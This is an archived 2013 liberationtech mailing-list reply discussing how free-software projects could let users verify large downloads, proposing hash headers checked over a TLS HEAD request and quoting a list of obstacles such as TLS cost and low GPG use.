[liberationtech] secure download tool - doesn't exist?!?

Owen Barton owen at civicactions.com
Mon Jul 1 11:43:33 PDT 2013 

Not an existing tool, but...

There is an existing optional http header called Content-MD5 - if this was
more widely used (actually extending the http spec to include a
Content-Sha256 header would be better) by servers and browsers that that
could allow this. Browsers could then perform a secure validation by
performing a TLS HEAD request on the same URL. If the hash from the TLS
HEAD header matched the hash of the http downloaded content, the browser
could provide some sort of visual indicator to the user (that links to the
SSL cert info pop-up).

Right now, even if you do use TLS for downloads, most browsers don't
actually provide any indication that a valid cert was used (or a way to
easily check whose cert it was) like they do with the lock/highlighting for
regular pages - so this seems like it would be a UX improvement there also.

Thanks!
- Owen


On Mon, Jul 1, 2013 at 11:03 AM, adrelanos <adrelanos at riseup.net> wrote:

> In response to "the tool doesn't exist"...
>
> You can create a really great privacy preserving application, Open
> Source, but when you want to share it with the world, it's difficult to
> ensure, that users actually get legit versions.
>
> Goal:
>
> - big file downloads
> - at least as secure as TLS
> - at least as simple as a regular download using a browser
> - not using TLS itself (too expensive) for bulk download
>
> The problem:
>
> 1. Unauthenticated downloads can get infected with malware on the fly
> and we're living in a world were governments are interested in doing so
> or already doing it.
>
> 2. There are no free Open Source hosts providing TLS or any other kind
> of authentication usable by layman. (github doesn't provide downloads
> anymore, sourceforge "only" offers unlimited free http downloads, no TLS.)
>
> 3. TLS downloads are expensive. I am creating Free Software myself
> already (Whonix), but I am not willing to pay hundred of dollars every
> month for TLS downloads and many other producers of Free Software aren't
> willing to do that as well. That's just the reality.
>
> 4. Gpg verification - almost no one uses it. Technically, it works okay,
> you can share your OpenPGP public key over TLS (web traffic isn't the
> most expensive thing, downloads are) or even web of trust (non-anonymous
> people) and it can verify builds. Since only one in twenty persons (or
> worse) uses it for verification, for whatever reasons, its not the
> solution.
>
> 5. Windows doesn't even have a package manager like Debian has apt-get.
> (Sorry, I am ignorant about Windows 8 and its app store thingy and not
> sure if FOSS developers can easily add their software.)
>
> 6. Linux distributions, such as Debian have awesome updating systems
> (Debian has apt-get, which even defeats The Update Framework threat
> model [1], other distributions may have similar great updaters.
>
> Problem: its far from easy to get software into the repository, you need
> to create packages following their policy, need to be a Debian developer
> or need a sponsor, thats absoutely non-trivial, many projects just
> failed or have given up (example: Retroshare).
>
> Usually their repository is filled up with high quality packages. Just
> many projects/newer projects not capable/compatible/etc. with that end
> up using less secure methods to share their software. There is nothing
> in the middle such as a PPA service. (Ubuntu has a PPA service, but
> Ubuntu should be avoided for other privacy issues [2].)
>
> 7. Metalink could solve it, if there where metalink downloaders
> supporting OpenPGP, but there aren't any.
>
> 8. Mainstream browsers don't come with Metalink/OpenPGP support out of
> the box, so you'd still have to tell users "you have to download tool X
> to download our tool Y".
>
> In conclusion:
>
> I don't think we need a gpg4win downloader, a TBB downloader, Tails
> downloader, a Whonix downloader... Thats just a lot duplicate effort and
> another bootstrap issue: how to share the download tool itself? Make it
> small and share it over TLS?
>
> I think, this kind of tool doesn't exist yet.
>
> References:
>
> [1]
> https://www.updateframework.com/wiki/Docs/Security#AttacksandWeaknesses
> [2]
>
> https://www.eff.org/deeplinks/2012/10/privacy-ubuntu-1210-amazon-ads-and-data-leaks
>
> --
> Too many emails? Unsubscribe, change to digest, or change password by
> emailing moderator at companys at stanford.edu or changing your settings at
> https://mailman.stanford.edu/mailman/listinfo/liberationtech
>



-- 
Owen Barton, CivicActions, Inc.
cell: 805-699-6099, skype/irc: grugnog
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mailman.stanford.edu/pipermail/liberationtech/attachments/20130701/7126f634/attachment.html>

More information about the liberationtech mailing list